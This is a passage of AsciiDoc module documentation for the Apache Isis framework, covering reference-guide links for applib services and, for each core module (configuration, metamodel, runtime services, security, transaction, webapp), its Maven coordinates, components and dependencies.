xref:refguide:applib:index\/services\/bookmark\/BookmarkHolder_lookup.adoc[BookmarkHolder_lookup], xref:refguide:applib:index\/services\/bookmark\/BookmarkHolder_object.adoc[BookmarkHolder_object], xref:refguide:applib:index\/services\/bookmark\/BookmarkService.adoc[BookmarkService], xref:refguide:applib:index\/services\/bookmarkui\/BookmarkUiService.adoc[BookmarkUiService], xref:refguide:applib:index\/services\/clock\/ClockService.adoc[ClockService], xref:refguide:applib:index\/services\/command\/Command.adoc[Command], xref:refguide:applib:index\/services\/command\/CommandExecutorService.adoc[CommandExecutorService], xref:refguide:applib:index\/services\/command\/CommandOutcomeHandler.adoc[CommandOutcomeHandler], xref:refguide:applib:index\/services\/commanddto\/HasCommandDto.adoc[HasCommandDto], xref:refguide:applib:index\/services\/commanddto\/conmap\/ContentMappingServiceForCommandDto.adoc[ContentMappingServiceForCommandDto], xref:refguide:applib:index\/services\/commanddto\/conmap\/ContentMappingServiceForCommandsDto.adoc[ContentMappingServiceForCommandsDto], xref:refguide:applib:index\/services\/commanddto\/conmap\/UserDataKeys.adoc[UserDataKeys], xref:refguide:applib:index\/services\/commanddto\/processor\/CommandDtoProcessor.adoc[CommandDtoProcessor], xref:refguide:applib:index\/services\/commanddto\/processor\/CommandDtoProcessorForActionAbstract.adoc[CommandDtoProcessorForActionAbstract], xref:refguide:applib:index\/services\/commanddto\/processor\/CommandDtoProcessorForPropertyAbstract.adoc[CommandDtoProcessorForPropertyAbstract], xref:refguide:applib:index\/services\/commanddto\/processor\/spi\/CommandDtoProcessorService.adoc[CommandDtoProcessorService], xref:refguide:applib:index\/services\/commanddto\/processor\/spi\/CommandDtoProcessorServiceIdentity.adoc[CommandDtoProcessorServiceIdentity], xref:refguide:applib:index\/services\/confview\/ConfigurationMenu.adoc[ConfigurationMenu], xref:refguide:applib:index\/services\/confview\/ConfigurationProperty.adoc[ConfigurationProperty], xref:refguide:applib:index\/services\/confview\/ConfigurationViewService.adoc[ConfigurationViewService], xref:refguide:applib:index\/services\/conmap\/ContentMappingService.adoc[ContentMappingService], xref:refguide:applib:index\/services\/email\/EmailService.adoc[EmailService], xref:refguide:applib:index\/services\/error\/ErrorDetails.adoc[ErrorDetails], xref:refguide:applib:index\/services\/error\/ErrorReportingService.adoc[ErrorReportingService], xref:refguide:applib:index\/services\/error\/SimpleTicket.adoc[SimpleTicket], xref:refguide:applib:index\/services\/error\/Ticket.adoc[Ticket], xref:refguide:applib:index\/services\/eventbus\/EventBusService.adoc[EventBusService], xref:refguide:applib:index\/services\/exceprecog\/Category.adoc[Category], xref:refguide:applib:index\/services\/exceprecog\/ExceptionRecognizer.adoc[ExceptionRecognizer], xref:refguide:applib:index\/services\/exceprecog\/ExceptionRecognizerAbstract.adoc[ExceptionRecognizerAbstract], xref:refguide:applib:index\/services\/exceprecog\/ExceptionRecognizerForType.adoc[ExceptionRecognizerForType], xref:refguide:applib:index\/services\/exceprecog\/ExceptionRecognizerService.adoc[ExceptionRecognizerService], xref:refguide:applib:index\/services\/exceprecog\/Recognition.adoc[Recognition], xref:refguide:applib:index\/services\/factory\/FactoryService.adoc[FactoryService], xref:refguide:applib:index\/services\/grid\/GridLoaderService.adoc[GridLoaderService], xref:refguide:applib:index\/services\/grid\/GridService.adoc[GridService], xref:refguide:applib:index\/services\/grid\/GridSystemService.adoc[GridSystemService], xref:refguide:applib:index\/services\/health\/Health.adoc[Health], xref:refguide:applib:index\/services\/health\/HealthCheckService.adoc[HealthCheckService], xref:refguide:applib:index\/services\/hint\/HintIdProvider.adoc[HintIdProvider], xref:refguide:applib:index\/services\/hint\/HintStore.adoc[HintStore], xref:refguide:applib:index\/services\/homepage\/HomePageResolverService.adoc[HomePageResolverService], xref:refguide:applib:index\/services\/i18n\/LocaleProvider.adoc[LocaleProvider], xref:refguide:applib:index\/services\/i18n\/Mode.adoc[Mode], xref:refguide:applib:index\/services\/i18n\/TranslatableString.adoc[TranslatableString], xref:refguide:applib:index\/services\/i18n\/TranslationService.adoc[TranslationService], xref:refguide:applib:index\/services\/i18n\/TranslationsResolver.adoc[TranslationsResolver], xref:refguide:applib:index\/services\/iactn\/ActionInvocation.adoc[ActionInvocation], xref:refguide:applib:index\/services\/iactn\/Execution.adoc[Execution], xref:refguide:applib:index\/services\/iactn\/ExecutionContext.adoc[ExecutionContext], xref:refguide:applib:index\/services\/iactn\/Interaction.adoc[Interaction], xref:refguide:applib:index\/services\/iactn\/InteractionContext.adoc[InteractionContext], xref:refguide:applib:index\/services\/iactn\/PropertyEdit.adoc[PropertyEdit], xref:refguide:applib:index\/services\/iactn\/SequenceType.adoc[SequenceType], xref:refguide:applib:index\/services\/inject\/ServiceInjector.adoc[ServiceInjector], xref:refguide:applib:index\/services\/jaxb\/JaxbService.adoc[JaxbService], xref:refguide:applib:index\/services\/layout\/LayoutService.adoc[LayoutService], xref:refguide:applib:index\/services\/layout\/LayoutServiceMenu.adoc[LayoutServiceMenu], xref:refguide:applib:index\/services\/layout\/Style.adoc[Style], xref:refguide:applib:index\/services\/linking\/DeepLinkService.adoc[DeepLinkService], xref:refguide:applib:index\/services\/menu\/MenuBarsLoaderService.adoc[MenuBarsLoaderService], xref:refguide:applib:index\/services\/menu\/MenuBarsService.adoc[MenuBarsService], xref:refguide:applib:index\/services\/message\/MessageService.adoc[MessageService], xref:refguide:applib:index\/services\/metamodel\/BeanSort.adoc[BeanSort], xref:refguide:applib:index\/services\/metamodel\/Config.adoc[Config], xref:refguide:applib:index\/services\/metamodel\/DomainMember.adoc[DomainMember], xref:refguide:applib:index\/services\/metamodel\/DomainModel.adoc[DomainModel], xref:refguide:applib:index\/services\/metamodel\/MetaModelService.adoc[MetaModelService], xref:refguide:applib:index\/services\/metamodel\/MetaModelServiceMenu.adoc[MetaModelServiceMenu], xref:refguide:applib:index\/services\/metrics\/MetricsService.adoc[MetricsService], xref:refguide:applib:index\/services\/publishing\/log\/CommandLogger.adoc[CommandLogger], xref:refguide:applib:index\/services\/publishing\/log\/EntityChangesLogger.adoc[EntityChangesLogger], xref:refguide:applib:index\/services\/publishing\/log\/EntityPropertyChangeLogger.adoc[EntityPropertyChangeLogger], xref:refguide:applib:index\/services\/publishing\/log\/ExecutionLogger.adoc[ExecutionLogger], xref:refguide:applib:index\/services\/publishing\/spi\/CommandSubscriber.adoc[CommandSubscriber], xref:refguide:applib:index\/services\/publishing\/spi\/EntityChanges.adoc[EntityChanges], xref:refguide:applib:index\/services\/publishing\/spi\/EntityChangesSubscriber.adoc[EntityChangesSubscriber], xref:refguide:applib:index\/services\/publishing\/spi\/EntityPropertyChange.adoc[EntityPropertyChange], xref:refguide:applib:index\/services\/publishing\/spi\/EntityPropertyChangeSubscriber.adoc[EntityPropertyChangeSubscriber], xref:refguide:applib:index\/services\/publishing\/spi\/ExecutionSubscriber.adoc[ExecutionSubscriber], xref:refguide:applib:index\/services\/queryresultscache\/MethodReferences.adoc[MethodReferences], xref:refguide:applib:index\/services\/queryresultscache\/QueryResultsCache.adoc[QueryResultsCache], xref:refguide:applib:index\/services\/queryresultscache\/QueryResultsCacheControl.adoc[QueryResultsCacheControl], xref:refguide:applib:index\/services\/registry\/InstanceByPriorityComparator.adoc[InstanceByPriorityComparator], xref:refguide:applib:index\/services\/registry\/ServiceRegistry.adoc[ServiceRegistry], xref:refguide:applib:index\/services\/repository\/EntityState.adoc[EntityState], xref:refguide:applib:index\/services\/repository\/RepositoryService.adoc[RepositoryService], xref:refguide:applib:index\/services\/routing\/RoutingService.adoc[RoutingService], xref:refguide:applib:index\/services\/scratchpad\/Scratchpad.adoc[Scratchpad], xref:refguide:applib:index\/services\/session\/SessionLoggingService.adoc[SessionLoggingService], xref:refguide:applib:index\/services\/session\/SessionLoggingServiceLogging.adoc[SessionLoggingServiceLogging], xref:refguide:applib:index\/services\/sudo\/SudoService.adoc[SudoService], xref:refguide:applib:index\/services\/swagger\/Format.adoc[Format], xref:refguide:applib:index\/services\/swagger\/SwaggerService.adoc[SwaggerService], xref:refguide:applib:index\/services\/swagger\/Visibility.adoc[Visibility], xref:refguide:applib:index\/services\/tablecol\/TableColumnOrderForCollectionTypeAbstract.adoc[TableColumnOrderForCollectionTypeAbstract], xref:refguide:applib:index\/services\/tablecol\/TableColumnOrderService.adoc[TableColumnOrderService], xref:refguide:applib:index\/services\/title\/TitleService.adoc[TitleService], xref:refguide:applib:index\/services\/urlencoding\/UrlEncodingService.adoc[UrlEncodingService], xref:refguide:applib:index\/services\/urlencoding\/UrlEncodingServiceUsingBaseEncodingAbstract.adoc[UrlEncodingServiceUsingBaseEncodingAbstract], xref:refguide:applib:index\/services\/user\/RoleMemento.adoc[RoleMemento], xref:refguide:applib:index\/services\/user\/UserMemento.adoc[UserMemento], xref:refguide:applib:index\/services\/user\/UserService.adoc[UserService], xref:refguide:applib:index\/services\/userprof\/UserProfileService.adoc[UserProfileService], xref:refguide:applib:index\/services\/userreg\/EmailNotificationService.adoc[EmailNotificationService], xref:refguide:applib:index\/services\/userreg\/UserDetails.adoc[UserDetails], xref:refguide:applib:index\/services\/userreg\/UserRegistrationService.adoc[UserRegistrationService], xref:refguide:applib:index\/services\/userreg\/events\/EmailEventAbstract.adoc[EmailEventAbstract], xref:refguide:applib:index\/services\/userreg\/events\/EmailRegistrationEvent.adoc[EmailRegistrationEvent], xref:refguide:applib:index\/services\/userreg\/events\/PasswordResetEvent.adoc[PasswordResetEvent], xref:refguide:applib:index\/services\/wrapper\/DisabledException.adoc[DisabledException], xref:refguide:applib:index\/services\/wrapper\/HiddenException.adoc[HiddenException], xref:refguide:applib:index\/services\/wrapper\/InvalidException.adoc[InvalidException], xref:refguide:applib:index\/services\/wrapper\/WrapperFactory.adoc[WrapperFactory], xref:refguide:applib:index\/services\/wrapper\/WrappingObject.adoc[WrappingObject], xref:refguide:applib:index\/services\/wrapper\/control\/AsyncControl.adoc[AsyncControl], xref:refguide:applib:index\/services\/wrapper\/control\/ControlAbstract.adoc[ControlAbstract], xref:refguide:applib:index\/services\/wrapper\/control\/ExceptionHandler.adoc[ExceptionHandler], xref:refguide:applib:index\/services\/wrapper\/control\/ExceptionHandlerAbstract.adoc[ExceptionHandlerAbstract], xref:refguide:applib:index\/services\/wrapper\/control\/ExecutionMode.adoc[ExecutionMode], xref:refguide:applib:index\/services\/wrapper\/control\/SyncControl.adoc[SyncControl], xref:refguide:applib:index\/services\/wrapper\/events\/AccessEvent.adoc[AccessEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ActionArgumentEvent.adoc[ActionArgumentEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ActionInvocationEvent.adoc[ActionInvocationEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ActionUsabilityEvent.adoc[ActionUsabilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ActionVisibilityEvent.adoc[ActionVisibilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/CollectionAccessEvent.adoc[CollectionAccessEvent], xref:refguide:applib:index\/services\/wrapper\/events\/CollectionAddToEvent.adoc[CollectionAddToEvent], xref:refguide:applib:index\/services\/wrapper\/events\/CollectionMethodEvent.adoc[CollectionMethodEvent], xref:refguide:applib:index\/services\/wrapper\/events\/CollectionRemoveFromEvent.adoc[CollectionRemoveFromEvent], xref:refguide:applib:index\/services\/wrapper\/events\/CollectionUsabilityEvent.adoc[CollectionUsabilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/InteractionEvent.adoc[InteractionEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ObjectTitleEvent.adoc[ObjectTitleEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ObjectValidityEvent.adoc[ObjectValidityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ObjectVisibilityEvent.adoc[ObjectVisibilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ParseValueEvent.adoc[ParseValueEvent], xref:refguide:applib:index\/services\/wrapper\/events\/PropertyAccessEvent.adoc[PropertyAccessEvent], xref:refguide:applib:index\/services\/wrapper\/events\/PropertyModifyEvent.adoc[PropertyModifyEvent], xref:refguide:applib:index\/services\/wrapper\/events\/PropertyUsabilityEvent.adoc[PropertyUsabilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/PropertyVisibilityEvent.adoc[PropertyVisibilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ProposedHolderEvent.adoc[ProposedHolderEvent], xref:refguide:applib:index\/services\/wrapper\/events\/UsabilityEvent.adoc[UsabilityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/ValidityEvent.adoc[ValidityEvent], xref:refguide:applib:index\/services\/wrapper\/events\/VisibilityEvent.adoc[VisibilityEvent], xref:refguide:applib:index\/services\/wrapper\/listeners\/InteractionAdapter.adoc[InteractionAdapter], xref:refguide:applib:index\/services\/wrapper\/listeners\/InteractionListener.adoc[InteractionListener], xref:refguide:applib:index\/services\/xactn\/TransactionId.adoc[TransactionId], xref:refguide:applib:index\/services\/xactn\/TransactionService.adoc[TransactionService], xref:refguide:applib:index\/services\/xactn\/TransactionState.adoc[TransactionState], xref:refguide:applib:index\/services\/xactn\/TransactionalProcessor.adoc[TransactionalProcessor], xref:refguide:applib:index\/services\/xml\/XmlService.adoc[XmlService], xref:refguide:applib:index\/services\/xmlsnapshot\/XmlSnapshotService.adoc[XmlSnapshotService], xref:refguide:applib:index\/services\/xmlsnapshot\/XmlSnapshotService~Snapshot.adoc[XmlSnapshotService.Snapshot], xref:refguide:applib:index\/services\/xmlsnapshot\/XmlSnapshotService~Snapshot~Builder.adoc[XmlSnapshotService.Snapshot.Builder], xref:refguide:applib:index\/snapshot\/SnapshottableWithInclusions.adoc[SnapshottableWithInclusions], xref:refguide:applib:index\/spec\/AbstractSpecification.adoc[AbstractSpecification], xref:refguide:applib:index\/spec\/AbstractSpecification2.adoc[AbstractSpecification2], xref:refguide:applib:index\/spec\/Specification.adoc[Specification], xref:refguide:applib:index\/spec\/Specification2.adoc[Specification2], xref:refguide:applib:index\/spec\/SpecificationAnd.adoc[SpecificationAnd], xref:refguide:applib:index\/spec\/SpecificationNot.adoc[SpecificationNot], xref:refguide:applib:index\/spec\/SpecificationOr.adoc[SpecificationOr], xref:refguide:applib:index\/types\/DescriptionType.adoc[DescriptionType], xref:refguide:applib:index\/types\/MemberIdentifierType.adoc[MemberIdentifierType], xref:refguide:applib:index\/types\/TargetActionType.adoc[TargetActionType], xref:refguide:applib:index\/types\/TargetClassType.adoc[TargetClassType], xref:refguide:applib:index\/util\/Enums.adoc[Enums], xref:refguide:applib:index\/util\/Equality.adoc[Equality], xref:refguide:applib:index\/util\/Hashing.adoc[Hashing], xref:refguide:applib:index\/util\/JaxbUtil.adoc[JaxbUtil], xref:refguide:applib:index\/util\/ObjectContracts.adoc[ObjectContracts], xref:refguide:applib:index\/util\/ReasonBuffer.adoc[ReasonBuffer], xref:refguide:applib:index\/util\/ReasonBuffer2.adoc[ReasonBuffer2], xref:refguide:applib:index\/util\/Reasons.adoc[Reasons], xref:refguide:applib:index\/util\/TitleBuffer.adoc[TitleBuffer], xref:refguide:applib:index\/util\/TitleBufferException.adoc[TitleBufferException], xref:refguide:applib:index\/util\/ToString.adoc[ToString], xref:refguide:applib:index\/util\/schema\/ChangesDtoUtils.adoc[ChangesDtoUtils], xref:refguide:applib:index\/util\/schema\/CommandDtoUtils.adoc[CommandDtoUtils], xref:refguide:applib:index\/util\/schema\/CommonDtoUtils.adoc[CommonDtoUtils], xref:refguide:applib:index\/util\/schema\/InteractionDtoUtils.adoc[InteractionDtoUtils], xref:refguide:applib:index\/util\/schema\/MemberExecutionDtoUtils.adoc[MemberExecutionDtoUtils], xref:refguide:applib:index\/value\/Blob.adoc[Blob], xref:refguide:applib:index\/value\/Clob.adoc[Clob], xref:refguide:applib:index\/value\/HasHtml.adoc[HasHtml], xref:refguide:applib:index\/value\/LocalResourcePath.adoc[LocalResourcePath], xref:refguide:applib:index\/value\/Markup.adoc[Markup], xref:refguide:applib:index\/value\/NamedWithMimeType.adoc[NamedWithMimeType], xref:refguide:applib:index\/value\/OpenUrlStrategy.adoc[OpenUrlStrategy], xref:refguide:applib:index\/value\/Password.adoc[Password]\n****\n\n|Apache Isis Core - Code Gen (ByteBuddy)\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-codegen-bytebuddy\nType: jar\nDirectory: \/core\/codegen-bytebuddy\n----\n|Code generation using ByteBuddy.\n\n.Components\n****\no.a.i.core.codegen.bytebuddy.services.ProxyFactoryServiceByteBuddy +\n****\n\n.Dependencies\n****\nnet.bytebuddy:byte-buddy:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.objenesis:objenesis:jar:<managed> +\n****\n\n|Apache Isis Core - Configuration\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-config\nType: jar\nDirectory: \/core\/config\n----\n|Isis configuration library for framework internal use.\n\n.Components\n****\no.a.i.core.config.RestEasyConfiguration$RestfulPathProviderImpl +\no.a.i.core.config.beans.IsisBeanFactoryPostProcessorForSpring +\no.a.i.core.config.beans.IsisBeanTypeRegistryDefault +\no.a.i.core.config.converters.PatternsConverter +\no.a.i.core.config.datasources.DataSourceIntrospectionService +\no.a.i.core.config.environment.IsisLocaleInitializer +\no.a.i.core.config.environment.IsisSystemEnvironment +\no.a.i.core.config.environment.IsisTimeZoneInitializer +\no.a.i.core.config.validators.PatternOptionalStringConstraintValidator +\no.a.i.core.config.viewer.wicket.WebAppContextPath +\n****\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.hibernate.validator:hibernate-validator:jar:<managed> +\norg.springframework.boot:spring-boot-configuration-processor:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/config\/datasources\/DataSourceIntrospectionService.adoc[DataSourceIntrospectionService]\n****\n\n|Apache Isis Core - Interaction\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-interaction\nType: jar\nDirectory: \/core\/interaction\n----\n|Provides _Interaction Scope_.\nTop level action execution or property changes are wrapped in an _Interaction_.\nThat typically corresponds to a http request\/response cycle or a JUnit test method execution.\n\n.Components\n****\no.a.i.core.interaction.integration.InteractionAwareTransactionalBoundaryHandler +\no.a.i.core.interaction.scope.InteractionScopeBeanFactoryPostProcessor +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/interaction\/session\/InteractionFactory.adoc[InteractionFactory]\n****\n\n|Apache Isis Core - Unit Test Support\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-internaltestsupport\nType: jar\nDirectory: \/core\/internaltestsupport\n----\n|Support for writing unit tests in either JUnit 4 or JUnit 5; should be added as a dependency with scope=test only\n\n.Dependencies\n****\nnet.bytebuddy:byte-buddy:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-core-codegen-bytebuddy:jar:<managed> +\norg.assertj:assertj-core:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\norg.hamcrest:hamcrest-library:jar:<managed> +\norg.jmock:jmock:jar:<managed> +\norg.jmock:jmock-junit4:jar:<managed> +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> +\norg.junit.jupiter:junit-jupiter-engine:jar:<managed> +\norg.junit.vintage:junit-vintage-engine:jar:<managed> +\norg.mockito:mockito-core:jar:<managed> +\norg.picocontainer:picocontainer:jar:<managed> +\norg.slf4j:slf4j-api:jar:${slf4j-api.version} +\norg.springframework:spring-test:jar:<managed> +\norg.springframework.boot:spring-boot-starter-test:jar:<managed> +\n****\n\n|Apache Isis Core - MetaModel\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-metamodel\nType: jar\nDirectory: \/core\/metamodel\n----\n|.Components\n****\no.a.i.core.metamodel.facets.schema.IsisSchemaMetaModelRefiner +\no.a.i.core.metamodel.facets.schema.IsisSchemaValueTypeProvider +\no.a.i.core.metamodel.objectmanager.ObjectManagerDefault +\no.a.i.core.metamodel.progmodel.ProgrammingModelInitFilterDefault +\no.a.i.core.metamodel.services.ServiceInjectorDefault +\no.a.i.core.metamodel.services.appfeat.ApplicationFeatureRepositoryDefault +\no.a.i.core.metamodel.services.classsubstitutor.ClassSubstitutorDefault +\no.a.i.core.metamodel.services.classsubstitutor.ClassSubstitutorForCollections +\no.a.i.core.metamodel.services.classsubstitutor.ClassSubstitutorForDomainObjects +\no.a.i.core.metamodel.services.classsubstitutor.ClassSubstitutorRegistry +\no.a.i.core.metamodel.services.events.MetamodelEventService +\no.a.i.core.metamodel.services.exceprecog.ExceptionRecognizerForRecoverableException +\no.a.i.core.metamodel.services.grid.GridLoaderServiceDefault +\no.a.i.core.metamodel.services.grid.GridReaderUsingJaxb +\no.a.i.core.metamodel.services.grid.GridServiceDefault +\no.a.i.core.metamodel.services.grid.bootstrap3.GridSystemServiceBS3 +\no.a.i.core.metamodel.services.layout.LayoutServiceDefault +\no.a.i.core.metamodel.services.metamodel.MetaModelServiceDefault +\no.a.i.core.metamodel.services.registry.ServiceRegistryDefault +\no.a.i.core.metamodel.services.tablecol.TableColumnOrderServiceDefault +\no.a.i.core.metamodel.services.title.TitleServiceDefault +\no.a.i.core.metamodel.specloader.InjectorMethodEvaluatorDefault +\no.a.i.core.metamodel.specloader.ProgrammingModelServiceDefault +\no.a.i.core.metamodel.specloader.SpecificationLoaderDefault +\no.a.i.core.metamodel.valuetypes.ValueTypeProviderDefault +\no.a.i.core.metamodel.valuetypes.ValueTypeProviderForBuiltin +\no.a.i.core.metamodel.valuetypes.ValueTypeProviderForCollections +\no.a.i.core.metamodel.valuetypes.ValueTypeRegistry +\n****\n\n.Dependencies\n****\nio.swagger:swagger-core:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\norg.hibernate.validator:hibernate-validator:jar:<managed> +\norg.jmock:jmock:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/metamodel\/services\/command\/CommandDtoFactory.adoc[CommandDtoFactory], xref:refguide:core:index\/metamodel\/services\/ixn\/InteractionDtoFactory.adoc[InteractionDtoFactory], xref:refguide:core:index\/metamodel\/services\/publishing\/CommandPublisher.adoc[CommandPublisher], xref:refguide:core:index\/metamodel\/services\/publishing\/ExecutionPublisher.adoc[ExecutionPublisher]\n****\n\n|Apache Isis Core - Runtime\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-runtime\nType: jar\nDirectory: \/core\/runtime\n----\n|Bundles framework internal services, utilities and events.\n\n.Components\n****\no.a.i.core.runtime.events.MetamodelEventService +\no.a.i.core.runtime.events.TransactionEventEmitter +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-interaction:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-transaction:jar:<managed> +\n****\n\n|Apache Isis Core - Runtime Services\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-runtimeservices\nType: jar\nDirectory: \/core\/runtimeservices\n----\n|Introduced to keep the 'runtime' package concise. Viewers don't have dependencies on this module.\n\n.Components\n****\no.a.i.core.runtimeservices.bookmarks.BookmarkServiceDefault +\no.a.i.core.runtimeservices.clock.ClockServiceDefault +\no.a.i.core.runtimeservices.command.CommandDtoFactoryDefault +\no.a.i.core.runtimeservices.command.CommandExecutorServiceDefault +\no.a.i.core.runtimeservices.confmenu.ConfigurationViewServiceDefault +\no.a.i.core.runtimeservices.email.EmailServiceDefault +\no.a.i.core.runtimeservices.eventbus.EventBusServiceSpring +\no.a.i.core.runtimeservices.executor.MemberExecutorServiceDefault +\no.a.i.core.runtimeservices.factory.FactoryServiceDefault +\no.a.i.core.runtimeservices.homepage.HomePageResolverServiceDefault +\no.a.i.core.runtimeservices.i18n.po.TranslationServicePo +\no.a.i.core.runtimeservices.interaction.InteractionDtoFactoryDefault +\no.a.i.core.runtimeservices.jaxb.JaxbServiceDefault +\no.a.i.core.runtimeservices.menubars.MenuBarsLoaderServiceDefault +\no.a.i.core.runtimeservices.menubars.bootstrap3.MenuBarsServiceBS3 +\no.a.i.core.runtimeservices.message.MessageServiceDefault +\no.a.i.core.runtimeservices.publish.CommandPublisherDefault +\no.a.i.core.runtimeservices.publish.EntityChangesPublisherDefault +\no.a.i.core.runtimeservices.publish.EntityPropertyChangePublisherDefault +\no.a.i.core.runtimeservices.publish.ExecutionPublisherDefault +\no.a.i.core.runtimeservices.queryresultscache.QueryResultsCacheDefault +\no.a.i.core.runtimeservices.recognizer.ExceptionRecognizerServiceDefault +\no.a.i.core.runtimeservices.recognizer.dae.ExceptionRecognizerForDataAccessException +\no.a.i.core.runtimeservices.repository.RepositoryServiceDefault +\no.a.i.core.runtimeservices.routing.RoutingServiceDefault +\no.a.i.core.runtimeservices.scratchpad.ScratchpadDefault +\no.a.i.core.runtimeservices.session.InteractionFactoryDefault +\no.a.i.core.runtimeservices.sudo.SudoServiceDefault +\no.a.i.core.runtimeservices.transaction.TransactionServiceSpring +\no.a.i.core.runtimeservices.urlencoding.UrlEncodingServiceWithCompression +\no.a.i.core.runtimeservices.user.UserServiceDefault +\no.a.i.core.runtimeservices.userprof.UserProfileServiceDefault +\no.a.i.core.runtimeservices.userreg.EmailNotificationServiceDefault +\no.a.i.core.runtimeservices.wrapper.WrapperFactoryDefault +\no.a.i.core.runtimeservices.xml.XmlServiceDefault +\no.a.i.core.runtimeservices.xmlsnapshot.XmlSnapshotServiceDefault +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-codegen-bytebuddy:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.hsqldb:hsqldb:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/runtimeservices\/transaction\/TransactionServiceSpring.adoc[TransactionServiceSpring], xref:refguide:core:index\/runtimeservices\/xml\/XmlServiceDefault.adoc[XmlServiceDefault]\n****\n\n|Apache Isis Core - Security\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-security\nType: jar\nDirectory: \/core\/security\n----\n|.Components\n****\no.a.i.core.security.authentication.manager.AuthenticationManager +\no.a.i.core.security.authentication.standard.RandomCodeGeneratorDefault +\no.a.i.core.security.authorization.manager.AuthorizationManager +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.hamcrest:hamcrest-library:jar:<managed> +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> +\norg.junit.jupiter:junit-jupiter-engine:jar:<managed> +\norg.junit.vintage:junit-vintage-engine:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/security\/authentication\/Authentication.adoc[Authentication], xref:refguide:core:index\/security\/authentication\/AuthenticationRequest.adoc[AuthenticationRequest], xref:refguide:core:index\/security\/authentication\/Authenticator.adoc[Authenticator], xref:refguide:core:index\/security\/authorization\/Authorizor.adoc[Authorizor]\n****\n\n|Apache Isis Core - Transaction\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-transaction\nType: jar\nDirectory: \/core\/transaction\n----\n|Provides transaction integration with Spring and also\nentity change tracking, with associated publishing and pre\/post value events.\n\n.Components\n****\no.a.i.core.transaction.changetracking.EntityChangeTrackerDefault +\no.a.i.core.transaction.changetracking.events.TimestampService +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/transaction\/changetracking\/EntityChangeTracker.adoc[EntityChangeTracker], xref:refguide:core:index\/transaction\/changetracking\/EntityChangeTrackerDefault.adoc[EntityChangeTrackerDefault], xref:refguide:core:index\/transaction\/changetracking\/EntityChangesPublisher.adoc[EntityChangesPublisher], xref:refguide:core:index\/transaction\/changetracking\/EntityPropertyChangePublisher.adoc[EntityPropertyChangePublisher], xref:refguide:core:index\/transaction\/events\/TransactionAfterCompletionEvent.adoc[TransactionAfterCompletionEvent]\n****\n\n|Apache Isis Core - WebApp\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-webapp\nType: jar\nDirectory: \/core\/webapp\n----\n|Bundles all the web specific classes a srequired by viewers.\nIntroduced to keep the 'runtime' package concise.\n\n.Components\n****\no.a.i.core.webapp.health.HealthIndicatorUsingHealthCheckService +\no.a.i.core.webapp.modules.logonlog.WebModuleLogOnExceptionLogger +\no.a.i.core.webapp.modules.templresources.WebModuleTemplateResources +\no.a.i.core.webapp.webappctx.IsisWebAppContextInitializer +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-interaction:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-core-transaction:jar:<managed> +\norg.springframework:spring-web:jar:<managed> +\norg.springframework.boot:spring-boot:jar:<managed> +\norg.springframework.boot:spring-boot-actuator:jar:<managed> +\norg.springframework.boot:spring-boot-starter-thymeleaf:jar:<managed> +\n****\n\n|Apache 